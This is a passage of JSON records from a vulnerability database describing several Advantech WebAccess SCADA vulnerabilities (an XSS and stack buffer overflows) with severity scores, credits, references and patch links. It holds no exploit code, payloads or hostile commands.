"cpe:/a:broadwin:webaccess", "vulnerable": true }, { "cpe22Uri": "cpe:/a:advantech:advantech_webaccess", "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2012-001546" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Sense Vulnerability Coordination Team, Greg MacManus of iSIGHT Partners, Kuang-Chun Hung of Security Research and Service Institute-Information and Communication Security Technology Center (ICST), Luigi Auriemma, and\nSnake (alias).", "sources": [ { "db": "BID", "id": "52051" } ], "trust": 0.3 }, "cve": "CVE-2011-4522", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "author": "nvd@nist.gov", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "exploitabilityScore": 8.6, "id": "CVE-2011-4522", "impactScore": 2.9, "integrityImpact": "PARTIAL", "severity": "MEDIUM", "trust": 1.8, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0" }, { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "author": "IVD", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "exploitabilityScore": 8.6, "id": "1ac69822-2354-11e6-abef-000c29c66e3d", "impactScore": 2.9, "integrityImpact": "PARTIAL", "severity": "MEDIUM", "trust": 0.2, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.9 [IVD]" }, { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "author": "VULHUB", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "exploitabilityScore": 8.6, "id": "VHN-52467", "impactScore": 2.9, "integrityImpact": "PARTIAL", "severity": "MEDIUM", "trust": 0.1, "vectorString": "AV:N/AC:M/AU:N/C:N/I:P/A:N", "version": "2.0" } ], "cvssV3": [], "severity": [ { "author": "nvd@nist.gov", "id": "CVE-2011-4522", "trust": 1.0, "value": "MEDIUM" }, { "author": "NVD", "id": "CVE-2011-4522", "trust": 0.8, "value": "Medium" }, { "author": "CNNVD", "id": "CNNVD-201202-402", "trust": 0.6, "value": "MEDIUM" }, { "author": "IVD", "id": "1ac69822-2354-11e6-abef-000c29c66e3d", "trust": 0.2, "value": "MEDIUM" }, { "author": "VULHUB", "id": "VHN-52467", "trust": 0.1, "value": "MEDIUM" } ] } ], "sources": [ { "db": "IVD", "id": "1ac69822-2354-11e6-abef-000c29c66e3d" }, { "db": "VULHUB", "id": "VHN-52467" }, { "db": "JVNDB", "id": "JVNDB-2012-001546" }, { "db": "CNNVD", "id": "CNNVD-201202-402" }, { "db": "NVD", "id": "CVE-2011-4522" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Cross-site scripting (XSS) vulnerability in bwerrdn.asp in Advantech/BroadWin WebAccess before 7.0 allows remote attackers to inject arbitrary web script or HTML via unspecified parameters. Advantech Advantech specializes in network computer and network automation, providing more than 450 products including industrial data acquisition, automation software, computer platforms, Advantech industrial computers, computer motherboards and accessories. Advantech/BroadWin SCADA WebAccess is a fully browser-based Human Machine Interface (HMI) and Monitoring and Data Acquisition (SCADA) software. Advantech WebAccess bwerrdn.asp lacks filtering on parameters leading to cross-site scripting attacks. Advantech WebAccess is prone to multiple remote vulnerabilities. \nExploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database, execute arbitrary code gain access to sensitive information, cause a denial-of-service condition. Other attacks are possible. ----------------------------------------------------------------------\n\nOvum says ad hoc tools are out-dated. The best practice approach?\nFast vulnerability intelligence, threat handling, and setup in one tool. \n\nRead the new report on the Secunia VIM:\nhttp://secunia.com/products/corporate/vim/ovum_2011_request/ \n\n----------------------------------------------------------------------\n\nTITLE:\nAdvantech OPC Server ADAM ActiveX Control Buffer Overflow\nVulnerability\n\nSECUNIA ADVISORY ID:\nSA46775\n\nVERIFY ADVISORY:\nSecunia.com\nhttp://secunia.com/advisories/46775/\nCustomer Area (Credentials Required)\nhttps://ca.secunia.com/?page=viewadvisory\u0026vuln_id=46775\n\nRELEASE DATE:\n2011-11-07\n\nDISCUSS ADVISORY:\nhttp://secunia.com/advisories/46775/#comments\n\nAVAILABLE ON SITE AND IN CUSTOMER AREA:\n * Last Update\n * Popularity\n * Comments\n * Criticality Level\n * Impact\n * Where\n * Solution Status\n * Operating System / Software\n * CVE Reference(s)\n\nhttp://secunia.com/advisories/46775/\n\nONLY AVAILABLE IN CUSTOMER AREA:\n * Authentication Level\n * Report Reliability\n * Secunia PoC\n * Secunia Analysis\n * Systems Affected\n * Approve Distribution\n * Remediation Status\n * Secunia CVSS Score\n * CVSS\n\nhttps://ca.secunia.com/?page=viewadvisory\u0026vuln_id=46775\n\nONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:\n * AUTOMATED SCANNING\n\nhttp://secunia.com/vulnerability_scanning/personal/\nhttp://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/\n\nDESCRIPTION:\nA vulnerability has been reported in Advantech OPC Server, which can\nbe exploited by malicious people to compromise a user\u0027s system. \n\nThe vulnerability is caused due to an error in the ADAM ActiveX\ncontrol and can be exploited to cause a buffer overflow. \n\nSuccessful exploitation may allow execution of arbitrary code. \n\nThe vulnerability is reported in the following components:\n* Advantech ADAM OPC Server versions prior to V3.01.012. \n* Advantech Modbus RTU OPC Server versions prior to V3.01.010. \n* Advantech Modbus TCP OPC Server versions prior to V3.01.010. \n\nSOLUTION:\nReportedly a patch has been released. Contact the vendor for further\ninformation. \n\nPROVIDED AND/OR DISCOVERED BY:\nICS-CERT credits Security Research and Service Institute Information\nand Communication Security Technology Center (ICST). \n\nORIGINAL ADVISORY:\nICS-CERT:\nhttp://www.us-cert.gov/control_systems/pdf/ICSA-11-279-01.pdf\n\nOTHER REFERENCES:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nDEEP LINKS:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nEXTENDED DESCRIPTION:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nEXTENDED SOLUTION:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nEXPLOIT:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\n----------------------------------------------------------------------\n\nAbout:\nThis Advisory was delivered by Secunia as a free service to help\nprivate users keeping their systems up to date against the latest\nvulnerabilities. \n\nSubscribe:\nhttp://secunia.com/advisories/secunia_security_advisories/\n\nDefinitions: (Criticality, Where etc.)\nhttp://secunia.com/advisories/about_secunia_advisories/\n\n\nPlease Note:\nSecunia recommends that you verify all advisories you receive by\nclicking the link. \nSecunia NEVER sends attached files with advisories. \nSecunia does not advise people to install third party patches, only\nuse those supplied by the vendor. \n\n----------------------------------------------------------------------\n\nUnsubscribe: Secunia Security Advisories\nhttp://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org\n\n----------------------------------------------------------------------\n\n\n", "sources": [ { "db": "NVD", "id": "CVE-2011-4522" }, { "db": "JVNDB", "id": "JVNDB-2012-001546" }, { "db": "CNVD", "id": "CNVD-2012-0657" }, { "db": "BID", "id": "52051" }, { "db": "IVD", "id": "1ac69822-2354-11e6-abef-000c29c66e3d" }, { "db": "VULHUB", "id": "VHN-52467" }, { "db": "PACKETSTORM", "id": "106765" } ], "trust": 2.79 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2011-4522", "trust": 3.6 }, { "db": "ICS CERT", "id": "ICSA-12-047-01", "trust": 2.3 }, { "db": "BID", "id": "52051", "trust": 1.4 }, { "db": "CNNVD", "id": "CNNVD-201202-402", "trust": 0.9 }, { "db": "CNVD", "id": "CNVD-2012-0657", "trust": 0.8 }, { "db": "ICS CERT", "id": "ICSA-12-047-01A", "trust": 0.8 }, { "db": "JVNDB", "id": "JVNDB-2012-001546", "trust": 0.8 }, { "db": "ICS CERT", "id": "ICSA-11-279-01", "trust": 0.4 }, { "db": "IVD", "id": "1AC69822-2354-11E6-ABEF-000C29C66E3D", "trust": 0.2 }, { "db": "SECUNIA", "id": "46775", "trust": 0.2 }, { "db": "VULHUB", "id": "VHN-52467", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "106765", "trust": 0.1 } ], "sources": [ { "db": "IVD", "id": "1ac69822-2354-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2012-0657" }, { "db": "VULHUB", "id": "VHN-52467" }, { "db": "BID", "id": "52051" }, { "db": "JVNDB", "id": "JVNDB-2012-001546" }, { "db": "PACKETSTORM", "id": "106765" }, { "db": "CNNVD", "id": "CNNVD-201202-402" }, { "db": "NVD", "id": "CVE-2011-4522" } ] }, "id": "VAR-201202-0036", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "IVD", "id": "1ac69822-2354-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2012-0657" }, { "db": "VULHUB", "id": "VHN-52467" } ], "trust": 1.551177005 }, "iot_taxonomy": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "category": [ "ICS" ], "sub_category": null, "trust": 0.8 } ], "sources": [ { "db": "IVD", "id": "1ac69822-2354-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2012-0657" } ] }, "last_update_date": "2024-11-23T21:46:31.422000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "WebAccess", "trust": 0.8, "url": "http://www.advantech.co.jp/products/Webaccess-HMI-SCADA-Software/sub_GF-1M94V.aspx" }, { "title": "WebAccess", "trust": 0.8, "url": "http://www.broadwin.com/features.htm" }, { "title": "Offices Distributors", "trust": 0.8, "url": "http://www.broadwin.com/Offices.htm" }, { "title": "\u30d1\u30fc\u30c8\u30ca\u30fc\u60c5\u5831", "trust": 0.8, "url": "http://www.advantech.co.jp/support-AJP/distributors.asp" }, { "title": "Top Page", "trust": 0.8, "url": "http://www.advantech.co.jp/" }, { "title": "Patch for Advantech WebAccess Cross-Site Scripting Vulnerability (CNVD-2012-0657)", "trust": 0.6, "url": "https://www.cnvd.org.cn/patchInfo/show/10133" } ], "sources": [ { "db": "CNVD", "id": "CNVD-2012-0657" }, { "db": "JVNDB", "id": "JVNDB-2012-001546" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-79", "trust": 1.9 } ], "sources": [ { "db": "VULHUB", "id": "VHN-52467" }, { "db": "JVNDB", "id": "JVNDB-2012-001546" }, { "db": "NVD", "id": "CVE-2011-4522" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 2.3, "url": "http://www.us-cert.gov/control_systems/pdf/icsa-12-047-01.pdf" }, { "trust": 1.1, "url": "http://www.securityfocus.com/bid/52051" }, { "trust": 0.8, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-4522" }, { "trust": 0.8, "url": "http://www.us-cert.gov/control_systems/pdf/icsa-12-047-01a.pdf" }, { "trust": 0.8, "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2011-4522" }, { "trust": 0.4, "url": "http://www.us-cert.gov/control_systems/pdf/icsa-11-279-01.pdf" }, { "trust": 0.3, "url": "http://webaccess.advantech.com/product.php" }, { "trust": 0.1, "url": "https://ca.secunia.com/?page=viewadvisory\u0026vuln_id=46775" }, { "trust": 0.1, "url": "http://secunia.com/vulnerability_intelligence/" }, { "trust": 0.1, "url": "http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/" }, { "trust": 0.1, "url": "http://secunia.com/advisories/secunia_security_advisories/" }, { "trust": 0.1, "url": "http://secunia.com/advisories/about_secunia_advisories/" }, { "trust": 0.1, "url": "http://secunia.com/vulnerability_scanning/personal/" }, { "trust": 0.1, "url": "http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org" }, { "trust": 0.1, "url": "http://secunia.com/products/corporate/vim/ovum_2011_request/" }, { "trust": 0.1, "url": "http://secunia.com/advisories/46775/" }, { "trust": 0.1, "url": "http://secunia.com/advisories/46775/#comments" } ], "sources": [ { "db": "CNVD", "id": "CNVD-2012-0657" }, { "db": "VULHUB", "id": "VHN-52467" }, { "db": "BID", "id": "52051" }, { "db": "JVNDB", "id": "JVNDB-2012-001546" }, { "db": "PACKETSTORM", "id": "106765" }, { "db": "CNNVD", "id": "CNNVD-201202-402" }, { "db": "NVD", "id": "CVE-2011-4522" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "IVD", "id": "1ac69822-2354-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2012-0657" }, { "db": "VULHUB", "id": "VHN-52467" }, { "db": "BID", "id": "52051" }, { "db": "JVNDB", "id": "JVNDB-2012-001546" }, { "db": "PACKETSTORM", "id": "106765" }, { "db": "CNNVD", "id": "CNNVD-201202-402" }, { "db": "NVD", "id": "CVE-2011-4522" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2012-02-20T00:00:00", "db": "IVD", "id": "1ac69822-2354-11e6-abef-000c29c66e3d" }, { "date": "2012-02-20T00:00:00", "db": "CNVD", "id": "CNVD-2012-0657" }, { "date": "2012-02-21T00:00:00", "db": "VULHUB", "id": "VHN-52467" }, { "date": "2012-02-16T00:00:00", "db": "BID", "id": "52051" }, { "date": "2012-02-23T00:00:00", "db": "JVNDB", "id": "JVNDB-2012-001546" }, { "date": "2011-11-09T12:04:37", "db": "PACKETSTORM", "id": "106765" }, { "date": "2012-02-22T00:00:00", "db": "CNNVD", "id": "CNNVD-201202-402" }, { "date": "2012-02-21T13:31:55.937000", "db": "NVD", "id": "CVE-2011-4522" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2012-02-20T00:00:00", "db": "CNVD", "id": "CNVD-2012-0657" }, { "date": "2018-01-05T00:00:00", "db": "VULHUB", "id": "VHN-52467" }, { "date": "2012-02-16T00:00:00", "db": "BID", "id": "52051" }, { "date": "2012-02-23T00:00:00", "db": "JVNDB", "id": "JVNDB-2012-001546" }, { "date": "2012-02-22T00:00:00", "db": "CNNVD", "id": "CNNVD-201202-402" }, { "date": "2024-11-21T01:32:28.470000", "db": "NVD", "id": "CVE-2011-4522" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "remote", "sources": [ { "db": "CNNVD", "id": "CNNVD-201202-402" } ], "trust": 0.6 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Advantech/BroadWin WebAccess of bwview.asp Vulnerable to cross-site scripting", "sources": [ { "db": "JVNDB", "id": "JVNDB-2012-001546" } ], "trust": 0.8 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "XSS", "sources": [ { "db": "CNNVD", "id": "CNNVD-201202-402" } ], "trust": 0.6 } }
var-202109-1256
Vulnerability from variot
A stack-based buffer overflow vulnerability in Advantech WebAccess Versions 9.02 and prior caused by a lack of proper validation of the length of user-supplied data may allow remote code execution. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Advantech WebAccess. Authentication is not required to exploit this vulnerability.The specific flaw exists within the handling of IOCTL 0x2711, which can be used to invoke BwFLApp.exe. An attacker can leverage this vulnerability to execute code in the context of Administrator. Advantech WebAccess is a set of browser-based HMI/SCADA software from Advantech.
A stack buffer overflow vulnerability exists in Advantech WebAccess 9.02 and earlier. The software supports dynamic graphic display and real-time data control, and provides functions of remote control and management of automation equipment
Show details on source website{ "affected_products": { "_id": null, "data": [ { "_id": null, "model": "webaccess", "scope": "lte", "trust": 1.0, "vendor": "advantech", "version": "9.02" }, { "_id": null, "model": "webaccess", "scope": null, "trust": 0.7, "vendor": "advantech", "version": null }, { "_id": null, "model": "webaccess", "scope": "lte", "trust": 0.6, "vendor": "advantech", "version": "\u003c=9.02" } ], "sources": [ { "db": "ZDI", "id": "ZDI-21-1054" }, { "db": "CNVD", "id": "CNVD-2021-80272" }, { "db": "NVD", "id": "CVE-2021-38408" } ] }, "credits": { "_id": null, "data": "Natnael Samson (@NattiSamson)", "sources": [ { "db": "ZDI", "id": "ZDI-21-1054" }, { "db": "CNNVD", "id": "CNNVD-202109-132" } ], "trust": 1.3 }, "cve": "CVE-2021-38408", "cvss": { "_id": null, "data": [ { "cvssV2": [ { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "nvd@nist.gov", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "CVE-2021-38408", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 1.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "CNVD", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "CNVD-2021-80272", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 0.6, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "VULHUB", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "VHN-397274", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 0.1, "vectorString": "AV:N/AC:L/AU:N/C:P/I:P/A:P", "version": "2.0" } ], "cvssV3": [ { "attackComplexity": "LOW", "attackVector": "NETWORK", "author": "nvd@nist.gov", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "exploitabilityScore": 3.9, "id": "CVE-2021-38408", "impactScore": 5.9, "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "trust": 1.0, "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, { "attackComplexity": "LOW", "attackVector": "NETWORK", "author": "ZDI", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "exploitabilityScore": 3.9, "id": "CVE-2021-38408", "impactScore": 5.9, "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "trust": 0.7, "userInteraction": "NONE", "vectorString": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0" } ], "severity": [ { "author": "nvd@nist.gov", "id": "CVE-2021-38408", "trust": 1.0, "value": "CRITICAL" }, { "author": "ZDI", "id": "CVE-2021-38408", "trust": 0.7, "value": "CRITICAL" }, { "author": "CNVD", "id": "CNVD-2021-80272", "trust": 0.6, "value": "HIGH" }, { "author": "CNNVD", "id": "CNNVD-202109-132", "trust": 0.6, "value": "CRITICAL" }, { "author": "VULHUB", "id": "VHN-397274", "trust": 0.1, "value": "HIGH" } ] } ], "sources": [ { "db": "ZDI", "id": "ZDI-21-1054" }, { "db": "CNVD", "id": "CNVD-2021-80272" }, { "db": "VULHUB", "id": "VHN-397274" }, { "db": "CNNVD", "id": "CNNVD-202109-132" }, { "db": "NVD", "id": "CVE-2021-38408" } ] }, "description": { "_id": null, "data": "A stack-based buffer overflow vulnerability in Advantech WebAccess Versions 9.02 and prior caused by a lack of proper validation of the length of user-supplied data may allow remote code execution. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Advantech WebAccess. Authentication is not required to exploit this vulnerability.The specific flaw exists within the handling of IOCTL 0x2711, which can be used to invoke BwFLApp.exe. An attacker can leverage this vulnerability to execute code in the context of Administrator. Advantech WebAccess is a set of browser-based HMI/SCADA software from Advantech. \n\r\n\r\nA stack buffer overflow vulnerability exists in Advantech WebAccess 9.02 and earlier. The software supports dynamic graphic display and real-time data control, and provides functions of remote control and management of automation equipment", "sources": [ { "db": "NVD", "id": "CVE-2021-38408" }, { "db": "ZDI", "id": "ZDI-21-1054" }, { "db": "CNVD", "id": "CNVD-2021-80272" }, { "db": "VULHUB", "id": "VHN-397274" }, { "db": "VULMON", "id": "CVE-2021-38408" } ], "trust": 2.25 }, "external_ids": { "_id": null, "data": [ { "db": "NVD", "id": "CVE-2021-38408", "trust": 3.1 }, { "db": "ICS CERT", "id": "ICSA-21-245-03", "trust": 2.3 }, { "db": "ZDI", "id": "ZDI-21-1054", "trust": 1.4 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-12967", "trust": 0.7 }, { "db": "CNNVD", "id": "CNNVD-202109-132", "trust": 0.7 }, { "db": "CNVD", "id": "CNVD-2021-80272", "trust": 0.6 }, { "db": "AUSCERT", "id": "ESB-2021.2982", "trust": 0.6 }, { "db": "VULHUB", "id": "VHN-397274", "trust": 0.1 }, { "db": "VULMON", "id": "CVE-2021-38408", "trust": 0.1 } ], "sources": [ { "db": "ZDI", "id": "ZDI-21-1054" }, { "db": "CNVD", "id": "CNVD-2021-80272" }, { "db": "VULHUB", "id": "VHN-397274" }, { "db": "VULMON", "id": "CVE-2021-38408" }, { "db": "CNNVD", "id": "CNNVD-202109-132" }, { "db": "NVD", "id": "CVE-2021-38408" } ] }, "id": "VAR-202109-1256", "iot": { "_id": null, "data": true, "sources": [ { "db": "CNVD", "id": "CNVD-2021-80272" }, { "db": "VULHUB", "id": "VHN-397274" } ], "trust": 1.13470696 }, "iot_taxonomy": { "_id": null, "data": [ { "category": [ "ICS" ], "sub_category": null, "trust": 0.6 } ], "sources": [ { "db": "CNVD", "id": "CNVD-2021-80272" } ] }, "last_update_date": "2024-08-14T15:01:19.582000Z", "patch": { "_id": null, "data": [ { "title": "Advantech has issued an update to correct this vulnerability.", "trust": 0.7, "url": "https://us-cert.cisa.gov/ics/advisories/icsa-21-245-03" }, { "title": "Patch for Advantech WebAccess Stack Buffer Overflow Vulnerability (CNVD-2021-80272)", "trust": 0.6, "url": "https://www.cnvd.org.cn/patchInfo/show/294861" }, { "title": "Advantech WebAccess Buffer error vulnerability fix", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=162157" } ], "sources": [ { "db": "ZDI", "id": "ZDI-21-1054" }, { "db": "CNVD", "id": "CNVD-2021-80272" }, { "db": "CNNVD", "id": "CNNVD-202109-132" } ] }, "problemtype_data": { "_id": null, "data": [ { "problemtype": "CWE-121", "trust": 1.1 } ], "sources": [ { "db": "VULHUB", "id": "VHN-397274" }, { "db": "NVD", "id": "CVE-2021-38408" } ] }, "references": { "_id": null, "data": [ { "trust": 3.6, "url": "https://us-cert.cisa.gov/ics/advisories/icsa-21-245-03" }, { "trust": 0.7, "url": "https://www.zerodayinitiative.com/advisories/zdi-21-1054/" }, { "trust": 0.6, "url": "https://nvd.nist.gov/vuln/detail/cve-2021-38408" }, { "trust": 0.6, "url": "https://www.auscert.org.au/bulletins/esb-2021.2982" } ], "sources": [ { "db": "ZDI", "id": "ZDI-21-1054" }, { "db": "CNVD", "id": "CNVD-2021-80272" }, { "db": "VULHUB", "id": "VHN-397274" }, { "db": "VULMON", "id": "CVE-2021-38408" }, { "db": "CNNVD", "id": "CNNVD-202109-132" }, { "db": "NVD", "id": "CVE-2021-38408" } ] }, "sources": { "_id": null, "data": [ { "db": "ZDI", "id": "ZDI-21-1054", "ident": null }, { "db": "CNVD", "id": "CNVD-2021-80272", "ident": null }, { "db": "VULHUB", "id": "VHN-397274", "ident": null }, { "db": "VULMON", "id": "CVE-2021-38408", "ident": null }, { "db": "CNNVD", "id": "CNNVD-202109-132", "ident": null }, { "db": "NVD", "id": "CVE-2021-38408", "ident": null } ] }, "sources_release_date": { "_id": null, "data": [ { "date": "2021-09-03T00:00:00", "db": "ZDI", "id": "ZDI-21-1054", "ident": null }, { "date": "2021-10-26T00:00:00", "db": "CNVD", "id": "CNVD-2021-80272", "ident": null }, { "date": "2021-09-09T00:00:00", "db": "VULHUB", "id": "VHN-397274", "ident": null }, { "date": "2021-09-02T00:00:00", "db": "CNNVD", "id": "CNNVD-202109-132", "ident": null }, { "date": "2021-09-09T12:15:09.643000", "db": "NVD", "id": "CVE-2021-38408", "ident": null } ] }, "sources_update_date": { "_id": null, "data": [ { "date": "2021-09-03T00:00:00", "db": "ZDI", "id": "ZDI-21-1054", "ident": null }, { "date": "2022-01-18T00:00:00", "db": "CNVD", "id": "CNVD-2021-80272", "ident": null }, { "date": "2021-09-20T00:00:00", "db": "VULHUB", "id": "VHN-397274", "ident": null }, { "date": "2021-09-18T00:00:00", "db": "CNNVD", "id": "CNNVD-202109-132", "ident": null }, { "date": "2021-09-20T12:44:57.193000", "db": "NVD", "id": "CVE-2021-38408", "ident": null } ] }, "threat_type": { "_id": null, "data": "remote", "sources": [ { "db": "CNNVD", "id": "CNNVD-202109-132" } ], "trust": 0.6 }, "title": { "_id": null, "data": "Advantech WebAccess BwFLApp Stack-based Buffer Overflow Remote Code Execution Vulnerability", "sources": [ { "db": "ZDI", "id": "ZDI-21-1054" } ], "trust": 0.7 }, "type": { "_id": null, "data": "buffer error", "sources": [ { "db": "CNNVD", "id": "CNNVD-202109-132" } ], "trust": 0.6 } }
var-202006-0370
Vulnerability from variot
WebAccess Node Version 8.4.4 and prior is vulnerable to a stack-based buffer overflow, which may allow an attacker to remotely execute arbitrary code. WebAccess Node Is Advantech Industrial software provided by. The issue results from incorrect permissions set on a resource used by the service. Authentication is not required to exploit this vulnerability.The specific flaw exists within DATACORE.exe. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of Administrator. Advantech WebAccess browser-based HMI and SCADA software. Advantech WebAccess is a set of browser-based HMI/SCADA software developed by China Taiwan Advantech Company. The software supports dynamic graphic display and real-time data control, and provides functions of remote control and management of automation equipment
Show details on source website{ "affected_products": { "_id": null, "data": [ { "_id": null, "model": "webaccess", "scope": null, "trust": 1.4, "vendor": "advantech", "version": null }, { "_id": null, "model": "webaccess", "scope": "lte", "trust": 1.0, "vendor": "advantech", "version": "8.4.4" }, { "_id": null, "model": "webaccess", "scope": "eq", "trust": 0.8, "vendor": "advantech", "version": "8.4.4" }, { "_id": null, "model": "webaccess node", "scope": "lte", "trust": 0.6, "vendor": "advantech", "version": "\u003c=8.4.4" }, { "_id": null, "model": null, "scope": "eq", "trust": 0.4, "vendor": "webaccess", "version": "*" } ], "sources": [ { "db": "IVD", "id": "b5fb5c83-6937-4ff7-a6b9-209011280300" }, { "db": "IVD", "id": "36d665ec-7a01-4e8b-946b-ff1761ca7bf1" }, { "db": "ZDI", "id": "ZDI-20-655" }, { "db": "ZDI", "id": "ZDI-20-654" }, { "db": "CNVD", "id": "CNVD-2020-32232" }, { "db": "JVNDB", "id": "JVNDB-2020-005320" }, { "db": "NVD", "id": "CVE-2020-12019" } ] }, "configurations": { "_id": null, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "cpe_match": [ { "cpe22Uri": "cpe:/a:advantech:webaccess", "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2020-005320" } ] }, "credits": { "_id": null, "data": 